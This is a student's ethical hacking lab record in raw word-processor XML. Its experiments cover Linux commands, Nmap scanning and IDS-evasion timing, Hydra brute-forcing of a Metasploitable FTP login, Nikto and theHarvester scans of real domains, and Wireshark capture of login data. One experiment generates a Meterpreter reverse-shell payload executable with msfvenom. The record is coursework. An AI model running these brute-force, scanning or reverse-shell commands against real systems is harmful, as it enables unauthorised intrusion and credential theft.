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Ethical Hacking Lab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ITA1413 — ETHICAL HACKING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Rule="auto"/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Laboratory Manual /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Name: Balaji Rohith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0" w:before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 No.: 192521269</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:after="80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Guided by</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:after="800" w:before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Dr.Parthiban S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Department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Academic Year 2025–2026</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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SIMATS ENGINEERING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000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1209"/>
        <w:gridCol w:w="7560"/>
        <w:gridCol w:w="1311"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1209"/>
            <w:gridCol w:w="7560"/>
            <w:gridCol w:w="13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bottom w:color="cccccc" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="d9e2f3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bottom w:color="cccccc" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="d9e2f3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the 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bottom w:color="cccccc" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="d9e2f3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Execution of rm, users, and tree Commands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Execution of less, more, and vi Commands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Execution of tree, head, and tail Commands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Execution of ls, cat, and mkdir Commands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Execution of uptime, date, and mv Commands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Execution of touch, pwd, and wget Commands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Execution of cd, cp, and ls Commands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Nmap Service Version Detection, Aggressive Scan, and OS Detection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Nmap Timing: Polite and Normal IDS Evasion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Execution of free, sort, and history Commands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Nmap Timing: Aggressive and Insane Speed Scan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Port Scanning Tools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Host Discovery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Cracking the Password Using Hydra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Information Gathering Using theHarvester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Use Google and Who.is for Reconnaissance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Windows OS Commands Execution (traceroute, ping, ifconfig, netstat)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Vulnerabilities Analysis Using CGI Scanning with Nikto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Wireshark Sniffer for Network Traffic and Analysis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Implement the Boot Sector Virus Concept (msfvenom)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Batch File Execution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Packet Analyser Tool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Port Scanning Tools (Extended)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Nmap Timing and Performance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Shell Programming: Square of a Number and Biggest of Three Numbers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="cccccc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1: Execution of rm, users, and tree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execute and display the results of the rm, users, and tree commands in the Kali Linux operating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sample file using touch testfile.txt and confirm it with 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the file using: rm testfile.txt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users to list the currently logged-in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tree -L 2 to display the directory structure up to two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07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touch testfile.txt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testfile.txt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rm testfile.txt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kali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tree -L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Desktop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Downloads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Music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Pictures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Public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Templates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└── Videos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 directories, 0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Output of the rm, users, and tree commands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rm, users, and tree commands were executed successfully; rm deleted the test file, users listed the active session, and tree displayed the home-directory hierarchy.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2: Execution of less, more, and vi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execute and display the results of the less, more, and vi commands for viewing and editing text files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sample text file: head -20 /etc/services &gt; sample.txt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the file with less sample.txt and scroll using the arrow keys; quit with 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the file with more sample.txt and observe the page-by-page --More--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file with vi sample.txt, enter insert mode with i, make an edit, then save and exit with :wq.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09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head -20 /etc/services &gt; sample.txt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less sample.txt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tcpmux          1/tcp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           7/tcp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           7/udp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discard         9/tcp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:(END) -- press q to quit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more sample.txt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tcpmux          1/tcp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           7/tcp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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">--More--(20%)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vi sample.txt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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">-- INSERT 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:wq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"sample.txt" 20L, 340C written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less, more, and vi command sessions on sample.txt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less, more, and vi commands were used to view and edit a text file; the pager-style navigation of less/more and vi's insert-and-save workflow were observed.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3: Execution of tree, head, and tail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execute and display the results of the tree, head, and tail commands for inspecting directory structures and file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tree /etc/nmap to view the directory structure of the Nmap configuration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head -5 /etc/services to display the first five lines of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tail -5 /etc/services to display the last five lines of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 line ranges returned by head and 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0A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tree /etc/nmap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/etc/nmap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nmap-mac-prefixes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nmap-protocols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nmap-rpc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├── nmap-service-probes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└── nmap-services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0 directories, 5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head -5 /etc/services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tcpmux     1/tcp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      7/tcp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      7/udp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discard    9/tcp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discard    9/udp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tail -5 /etc/services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nfsd       2049/udp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knetd      2053/tcp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man        9535/tcp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isdninfo   9538/tcp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mtp        9539/tcp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tree, head, and tail output on system files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tree, head, and tail commands ran successfully, showing the Nmap configuration directory tree and the first and last five lines of /etc/services.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4: Execution of ls, cat, and mkdir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execute and display the results of the ls, cat, and mkdir commands for basic file and directory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mkdir lab_files to create a new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into it with cd lab_files, then create a file with cat &gt; notes.txt, type text, and save with Ctrl+D.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cat notes.txt to display the file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ls -l to list the directory contents with permissions and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0D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mkdir lab_files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cd lab_files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cat &gt; notes.txt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Ethical Hacking Lab - Experiment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^D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cat notes.txt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Ethical Hacking Lab - Experiment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ls -l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total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-rw-r--r-- 1 kali kali 36 Aug  3 11:02 notes.txt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mkdir, cat, and ls -l usage inside lab_files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 new directory was created and a file was written and displayed using mkdir, cat, and ls, confirming correct file creation and listing.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5: Execution of uptime, date, and mv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execute and display the results of the uptime, date, and mv commands for system status checking and file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uptime to check system uptime and load average.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date to display the current system date and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mv notes.txt renamed_notes.txt to rename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rename with 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0E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uptime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11:15:02 up  2:14,  1 user,  load average: 0.12, 0.09, 0.05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Mon Aug  3 11:15:07 IST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mv notes.txt renamed_notes.txt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renamed_notes.txt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uptime, date, and mv command output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uptime and date commands reported system status and time, and mv successfully renamed the target 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6: Execution of touch, pwd, and wget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execute and display the results of the touch, pwd, and wget commands for file creation, path checking, and file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pwd to display the current working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touch empty_file.txt to create an empty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wget https://www.kali.org to download a web page over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the downloaded file with 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0F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pwd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/home/kali/lab_files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touch empty_file.txt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empty_file.txt  renamed_notes.txt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wget https://www.kali.org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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">--2026-08-03 11:18:40--  https://www.kali.org/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Resolving www.kali.org...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Connecting to www.kali.org... connected.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HTTP request sent, awaiting response...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Length: 51204 (50K) [text/html]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Saving to: 'index.html'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index.html          100%[===================&gt;]  50.00K  --.-KB/s   in 0.05s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2026-08-03 11:18:41 (980 KB/s) - 'index.html' saved [51204/51204]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pwd, touch, and wget command output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pwd, touch, and wget commands were executed, confirming the working directory, creating a new file, and downloading a page over HTTP.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7: Execution of cd, cp, and ls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execute and display the results of the cd, cp, and ls commands for directory navigation and file copying.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cd .. to move up one directory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cp lab_files/renamed_notes.txt lab_files/backup_notes.txt to copy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cd lab_files to move back into the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ls to confirm both the original and copied files are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11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cd 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cp lab_files/renamed_notes.txt lab_files/backup_notes.txt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cd lab_files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kali@kali:~/lab_files$ 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backup_notes.txt  empty_file.txt  renamed_notes.txt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cd, cp, and ls command sequence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cd, cp, and ls commands were used to navigate directories and duplicate a file, confirming both the original and the copy existed afterward.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8: Nmap Service Version Detection, Aggressive Scan, and OS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use Nmap's -sV, -A, and -O options to detect running service versions, perform an aggressive scan, and identify the target's operating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 version-detection scan: nmap -sV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an OS-detection scan: nmap -O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an aggressive scan (combines -sV, -O, script scan, and traceroute): nmap -A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 additional detail (service banners, OS guess) each option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12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-sV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PORT    STATE SERVICE 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21/tcp  open  ftp      vsftpd 2.3.4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22/tcp  open  ssh      OpenSSH 7.9p1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80/tcp  open  http     Apache httpd 2.4.41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-O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Running: Linux 5.X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OS details: Linux 5.4 - 5.15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Network Distance: 1 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-A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PORT    STATE SERVICE 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21/tcp  open  ftp      vsftpd 2.3.4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22/tcp  open  ssh      OpenSSH 7.9p1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80/tcp  open  http     Apache httpd 2.4.41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|_http-title: Apache2 Default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OS details: Linux 5.4 - 5.15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Nmap -sV, -O, and -A scan results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Nmap's version-detection, OS-detection, and aggressive-scan options were used, revealing service banners and an operating-system estimate for the target.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9: Nmap Timing: Polite and Normal IDS Evasion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use Nmap's polite (-T2) and normal (-T3) timing templates to reduce scan visibility to intrusion detection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 polite scan: nmap -T2 192.168.1.1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 normal-speed scan: nmap -T3 192.168.1.1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 elapsed scan time and packet rate between the two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the trade-off between stealth and speed for IDS evasion.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14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-T2 192.168.1.1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PORT    STATE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21/tcp  open  ftp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22/tcp  open  ssh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80/tcp  open  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12.84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-T3 192.168.1.1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PORT    STATE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21/tcp  open  ftp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22/tcp  open  ssh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80/tcp  open  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4.71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Nmap -T2 (polite) and -T3 (normal) timing comparison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polite and normal timing templates were compared; -T2 took noticeably longer than -T3, illustrating the reduced footprint used for IDS evasion.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10: Execution of free, sort, and history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execute and display the results of the free, sort, and history commands for monitoring memory usage and reviewing command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free -h to display memory usage in human-readable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sort sample.txt to sort the lines of a text file alphabetically.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history to review previously executed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16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free -h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             total        used        free      shared  buff/cache   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Mem:            3.8Gi       612Mi       2.4Gi        45Mi       780Mi        3.0Gi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Swap:           1.0Gi          0B       1.0Gi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sort sample.txt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discard    9/tcp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      7/tcp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tcpmux     1/tcp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1  mkdir lab_files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  cd lab_files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3  cat &gt; notes.txt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4  ls -l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5  free -h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free, sort, and history command output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Memory usage, sorted file content, and the command history were displayed using the free, sort, and history commands respectively.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11: Nmap Timing: Aggressive and Insane Speed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use Nmap's aggressive (-T4) and insane (-T5) timing templates to maximise scan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an aggressive-speed scan: nmap -T4 192.168.1.1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an insane-speed scan: nmap -T5 192.168.1.1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 elapsed scan time against the polite and normal templates from Experiment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the risk of dropped packets at higher speeds on unstable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17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-T4 192.168.1.1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PORT    STATE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21/tcp  open  ftp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22/tcp  open  ssh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80/tcp  open  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1.83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-T5 192.168.1.1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PORT    STATE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21/tcp  open  ftp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22/tcp  open  ssh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80/tcp  open  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0.96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Nmap -T4 (aggressive) and -T5 (insane) timing comparison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aggressive and insane timing templates completed the scan in under two seconds each, confirming the expected speed gain over the polite/normal templates used in Experiment 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12: Port Scanning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use Nmap to identify open, closed, and filtered ports on a target host using different scan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 SYN scan: nmap -sS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 TCP connect scan: nmap -sT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an ACK scan: nmap -sA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 UDP scan: nmap -sU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 port states reported by each scan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19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-sS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Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-03 10:12 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scan report for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Host is up (0.00042s latency).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Not shown: 995 closed tcp ports (reset)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PORT    STATE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21/tcp  open  ftp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22/tcp  open  ssh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80/tcp  open  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139/tcp open  netbios-ssn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445/tcp open  microsoft-ds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4.71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-sT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PORT   STATE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21/tcp open  ftp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22/tcp open  ssh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80/tcp open  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6.38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Nmap SYN and TCP-connect scan output against 192.168.1.1</w:t>
      </w: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All four scan types (-sS, -sT, -sA, -sU) were run successfully, and the difference in speed and reported port state between them was observed.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13: Host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identify live hosts on a network using Nmap's host-discovery options before running a full port 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nmap -Pn 192.168.1.1 to skip discovery and assume the host is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nmap -sn 192.168.1.1 for a discovery-only (no port scan) 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nmap -PR 192.168.1.1 for ARP-based discovery on the local subnet.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nmap -n 192.168.1.1 to disable DNS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response times across the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1B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-sn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Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-03 10:20 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scan report for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Host is up (0.00038s latency).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0.15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-PR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scan report for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Host is up (0.00021s latency).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MAC Address: 08:00:27:4E:66:A1 (Oracle VirtualBox)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0.08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Ping-scan (-sn) and ARP discovery (-PR) results</w:t>
      </w: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Host discovery was performed using ping scan, ARP scan, and the skip-discovery option, confirming that the target host was reachable.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14: Cracking the Password Using Hydra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demonstrate brute-force login testing on an FTP service using Hydra with username and password wordlists.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Hydra from Applications → Password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target: FTP service on 192.168.1.101 (Metasploitable).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username and password wordlists from /usr/share/wordlists/metasploit/.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hydra -l user_list -P pass_list ftp://192.168.1.101 -V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verbose output and note the valid credential pair reported.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1D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hydra -l /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V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Hydra v9.5 (c) 2023 by van Hauser/THC - for legal purposes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[DATA] max 16 tasks per 1 server, overall 16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[DATA] attacking ftp://192.168.1.101:21/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[ATTEMPT] target 192.168.1.101 - login "msfadmin" - pass "abc123"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[ATTEMPT] target 192.168.1.101 - login "msfadmin" - pass "test"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[ATTEMPT] target 192.168.1.101 - login "msfadmin" - pass "batman"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[21][ftp] host: 192.168.1.101   login: msfadmin   password: msfadmin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1 of 1 target successfully completed, 1 valid password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Hydra finished at 2026-08-03 10:41:07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Hydra brute-forcing the FTP login on the Metasploitable target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table29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Hydra was used to brute-force the FTP login on the Metasploitable target; supplying wordlists and reading the verbose attempt log was demonstrated.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15: Information Gathering Using theHarvester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passively gather subdomains, IP ranges, and email addresses for a target domain using public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 target domain, e.g. www.zoho.com.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theHarvester -d www.zoho.com -l 300 -b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the tool to query each source (some show 'Missing API key' — expected).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ASNs, IP addresses, and URLs returned in the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1E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theHarvester -d www.zoho.com -l 300 -b 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* theHarvester 4.4.3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[*] Target: www.zoho.com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[*] Searching Bing.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[*] Searching CertSpotter.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[!] Missing API key for SecurityTrails (skipping this source)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[*] Searching crt.sh.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[*] Emails found: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[*] Hosts found: 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mail.zoho.com:198.18.5.20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docs.zoho.com:198.18.5.44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crm.zoho.com:198.18.5.61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[*] ASNS found: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AS28349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theHarvester source enumeration and results for www.zoho.com</w:t>
      </w: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TheHarvester was run against a target domain and successfully returned ASNs, IP addresses, and public URLs gathered from open sources.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16: Use Google and Who.is for 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perform passive reconnaissance on a domain using Google dorking and a WHOIS lookup, including DNS records and network diagnostics.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browser and use Google search operators (site:, filetype:, intitle:) against the target domain to locate indexed pages and file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browser and go to the who.is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target domain, e.g. www.saveetha.com.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Whois tab for registrar, dates, and name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DNS Records tab for A, MX, and NS records, and the Diagnostics tab for ping and traceroute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32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20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Google dork examples used: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site:saveetha.com filetype:pdf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site:saveetha.com intitle:"index of"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who.is - WHOIS Lookup, DNS Records, Diagnostics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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Domain Name: SAVEETHA.COM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Registrar: GoDaddy.com, LLC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Creation Date: 2001-03-14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Registry Expiry Date: 2027-03-14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Name Server: NS1.SAVEETHA.COM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Name Server: NS2.SAVEETHA.COM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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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DNS Records: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A     www.saveetha.com    103.21.58.10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MX    saveetha.com        mail.saveetha.com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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Diagnostics: ping / traceroute to saveetha.com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Reply from 103.21.58.10: bytes=32 time=18ms TTL=54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Reply from 103.21.58.10: bytes=32 time=21ms TTL=54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Google dork queries and WHOIS/DNS/diagnostic output for saveetha.com</w:t>
      </w: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dorking surfaced indexed files and pages for the domain, and a WHOIS lookup returned registrar information, DNS records, and network diagnostics, together giving a passive reconnaissance snapshot of the target.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17: Windows OS Commands Execution (traceroute, ping, ifconfig, netstat)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use built-in Windows command-line utilities (tracert, ping, ipconfig, netstat) for basic network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Windows command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tracert www.saveetha.com to view the route taken (Windows equivalent of traceroute).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ping &lt;IP address&gt; to check reachability and round-trip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ipconfig to view local interface configuration (Windows equivalent of ifconfig).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netstat to list active TCP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3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22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C:\Users\Student&gt; tracert www.saveetha.com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Tracing route to www.saveetha.com [103.21.58.10]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1     2 ms     1 ms     1 ms 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2    12 ms    10 ms    11 ms  10.10.0.1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3    24 ms    22 ms    23 ms  103.21.58.10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Trace complete.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C:\Users\Student&gt; ping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Reply from 192.168.1.1: bytes=32 time&lt;1ms TTL=64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Reply from 192.168.1.1: bytes=32 time&lt;1ms TTL=64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Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)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C:\Users\Student&gt; ipconfig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IPv4 Address. . . . . . . . . . . : 192.168.1.15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Subnet Mask . . . . . . . . . . . :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C:\Users\Student&gt; netstat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Proto  Local Address          Foreign Address       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TCP    192.168.1.15:54212     103.21.58.10:443       ESTABLISHED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tracert, ping, ipconfig, and netstat output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table35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tracert, ping, ipconfig, and netstat commands were run and used to check the route to a target, reachability, local configuration, and active connections.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18: Vulnerabilities Analysis Using CGI Scanning with Nikto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scan a web server for outdated software, missing security headers, and common misconfigurations using Nikto's CGI-directory scanning.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nikto -h www.zoho.com -Tuning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findings such as missing security headers.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nikto -h www.certifiedhacker.com -Cgidirs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the server banner, port, and any flagged CGI directories.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36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24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nikto -h www.zoho.com -Tuning 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- Nikto v2.5.0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Target IP:      52.39.13.11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Target Hostname: www.zoho.com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Target Port:     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Server: nginx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Missing X-Frame-Options header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Missing X-Content-Type-Options header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Missing X-XSS-Protection header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+ 7 host(s) tested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nikto -h www.certifiedhacker.com -Cgidirs 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Target Port:     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/cgi-bin/ directory found (possible admin interface)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+ Scan terminated: 12 error(s) and 9 item(s) reported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Nikto scan results showing missing security headers and CGI directories</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table37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Nikto was used to scan two web servers and reported missing security headers and CGI-directory findings worth further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19: Wireshark Sniffer for Network Traffic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capture live network traffic with Wireshark and inspect an HTTP login request to observe unencrypted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Wireshark and select the Wi-Fi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capture and log in to a test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the display filter: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the capture once the login request is seen.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Locate the HTTP POST request and inspect the submitted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38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25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Wireshark - Capturing on Wi-Fi   |   Display filter: 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No.  Time    Source           Destination      Protocol  Length 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142  3.201   192.168.1.15     198.18.5.20      HTTP      512     POST /login HTTP/1.1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143  3.204   198.18.5.20      192.168.1.15     HTTP      248     HTTP/1.1 302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144  3.250   192.168.1.15     198.18.5.20      HTTP      331     GET /dashboard HTTP/1.1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Hypertext Transfer Protocol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Content-Type: application/x-www-form-urlencoded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Form item: "username" = "testuser"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Form item: "password" = "test1234"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HTTP POST login request captured and inspected in Wireshark</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table39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Live network traffic was captured with Wireshark, filtered to HTTP, and inspected to show how unencrypted login data is visible in a packet capture.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20: Implement the Boot Sector Virus Concept (msfvenom)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explore msfvenom's payload listing and configuration options as part of understanding Metasploit payload structure, generation syntax, and delivery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system and resolve any Bundler errors in the Metasploit framework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msfvenom to view its usage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available payloads: msfvenom -l payloads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configurable options: msfvenom --list-options -p windows/meterpreter/reverse_tcp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syntax for generating a payload file and its supported output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40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27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msfvenom -l payloads | head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Framework Payloads (593 total)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windows/meterpreter/reverse_tcp   Inject Meterpreter (Windows x86)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windows/shell/reverse_tcp         Spawn shell over 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linux/x86/meterpreter/reverse_tcp Inject Meterpreter (Linux x86)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msfvenom --list-options -p windows/meterpreter/reverse_tcp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Options for payload/windows/meterpreter/reverse_tcp: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 Name    Current Setting  Required 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 LHOST                    yes       The listen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 LPORT   4444             yes       The listen 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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe &gt; payload.exe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[-] No platform was selected, choosing Msf::Module::Platform::Windows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Payload size: 354 bytes  Final size of exe file: 73802 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msfvenom payload listing and configurable options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table41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msfvenom payload generator was explored in a controlled lab environment: available payloads were listed, the reverse-TCP payload options were reviewed, and the correct generation syntax was identified.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21: Batch File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write a simple Windows batch (.bat) script that automates a sequence of command-prompt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Notepad and start the script with @echo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echo lines for the text to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pause where the script should wait for a keypress.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the file as test.bat ('Save as type: All Files').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Double-click the file to run it and observe the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42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29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C:\Users\Student&gt; notepad test.bat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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">-- test.bat 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@echo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Hello, this is a sample batch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Running network check...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pause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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">-- end of file 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C:\Users\Student&gt; test.bat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Hello, this is a sample batch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Running network check...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Press any key to continue . .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Batch file script and its console output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table43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 simple batch script using @echo off, echo, and pause was written, saved with a .bat extension, and executed successfully.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22: Packet Analyser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practise the three core stages of packet analysis — capturing, filtering, and inspecting — using Wireshark.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Wireshark and start a capture on the chosen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TCP, UDP, and HTTP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display filter (tcp, udp, or http) to isolate traffic of interest.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a packet and expand its Frame, Ethernet, IP, and Transport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the source/destination address, ports, and flags.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44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2A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Wireshark - Capturing on Wi-Fi   |   Display filter: tcp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No.  Time    Source           Destination      Protocol  Length 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88   1.004   192.168.1.15     142.250.67.36    TCP       66      54212 &gt; 443 [SYN]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89   1.028   142.250.67.36    192.168.1.15     TCP       66      443 &gt; 54212 [SYN, ACK]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90   1.029   192.168.1.15     142.250.67.36    TLSv1.3   583     Client Hello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Frame 90: 583 bytes on wire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Ethernet II, Src: 08:00:27:4e:66:a1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Internet Protocol Version 4, Src: 192.168.1.15, Dst: 142.250.67.36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Transmission Control Protocol, Src Port: 54212, Dst Port: 443, Seq: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TCP/TLS session captured and inspected layer by layer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table45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TCP, UDP, and HTTP packets were captured, filtered by protocol, and inspected layer by layer in Wireshark's packet-detail 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23: Port Scanning Tools (Extended)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control which ports Nmap checks using the -p, -p-, and -F flags.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core scans (-sS, -sT, -sA, -sU) against 192.168.1.1 for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a specific range: nmap -p 1-30 192.168.1.1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every port: nmap -p- 192.168.1.1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 fast scan: nmap -F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scan duration and thoroughness across the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46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2C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-p 1-30 192.168.1.1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PORT   STATE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21/tcp open  ftp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22/tcp open  ssh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2.10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-p- 192.168.1.1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Discovered open port 3306/tcp on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118.44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-F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Not shown: 95 closed tcp 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1.62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Nmap scans using -p 1-30, -p-, and -F</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table47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Nmap's port-specification flags (-p, -p-, -F) were used to control the scope of a port scan, and the trade-off between speed and coverage was observed.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24: Nmap Timing and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compare Nmap's six built-in timing templates (-T0 to -T5) for scan speed versus stealth.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nmap -T0 192.168.1.1 (paranoid, slowest).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nmap -T1 192.168.1.1 (sneaky).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nmap -T2 192.168.1.1 and nmap -T3 192.168.1.1 (default).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nmap -T4 192.168.1.1 (aggressive) and nmap -T5 192.168.1.1 (insane).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 elapsed scan time reported for each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48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2D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-T0 192.168.1.1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Stats: 0:05:12 elapsed; 0 hosts completed (1 up)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-T1 192.168.1.1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Stats: 0:01:04 elapsed; 0 hosts completed (1 up)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-T3 192.168.1.1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4.71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-T4 192.168.1.1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1.83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nmap -T5 192.168.1.1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Nmap done: 1 IP address (1 host up) scanned in 0.96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Scan duration compared across -T0 to -T5 timing templates</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table49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The six Nmap timing templates were compared against the same target, showing the expected trade-off between scan speed and stealth.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spacing w:after="12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Experiment 25: Shell Programming: Square of a Number and Biggest of Three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write and execute shell scripts that (i) read a number and find its square, and (ii) find the biggest of three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terminal in Kali Linux and create a script file: nano square.sh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script that reads a number and prints its square using arithmetic expansion $((...)).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the file, make it executable with chmod +x square.sh, then run ./square.sh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second script: nano biggest.sh, that reads three numbers and prints the largest using if-elif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Save, make it executable with chmod +x biggest.sh, and run ./biggest.sh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Observation / Output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table50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c3c" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="3c3c3c" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="1e1e1e" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F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cat square.sh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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18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"Enter a number:"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read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sq=$((n * n))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"Square of $n is $sq"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chmod +x square.sh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./square.sh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Enter a number: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Square of 7 is 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cat biggest.sh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9cdcfe"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18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echo "Enter three numbers:"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read a b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if [ $a -ge $b ] &amp;&amp; [ $a -ge $c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echo "Biggest: $a"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elif [ $b -ge $a ] &amp;&amp; [ $b -ge $c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echo "Biggest: $b"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 echo "Biggest: $c"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ec9b0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">kali@kali:~$ ./biggest.sh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Enter three numbers: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12 45 30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d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Biggest: 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spacing w:after="160" w:before="8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Shell scripts computing a square and the biggest of three numbers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table51"/>
        <w:tblW w:w="10080.0" w:type="dxa"/>
        <w:jc w:val="left"/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Two shell scripts were written and executed successfully — one calculating the square of a number, and the other identifying the largest of three input numbers.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iberation Sans"/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5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6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Ethical Hacking Lab Record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Ethical Hacking Lab Record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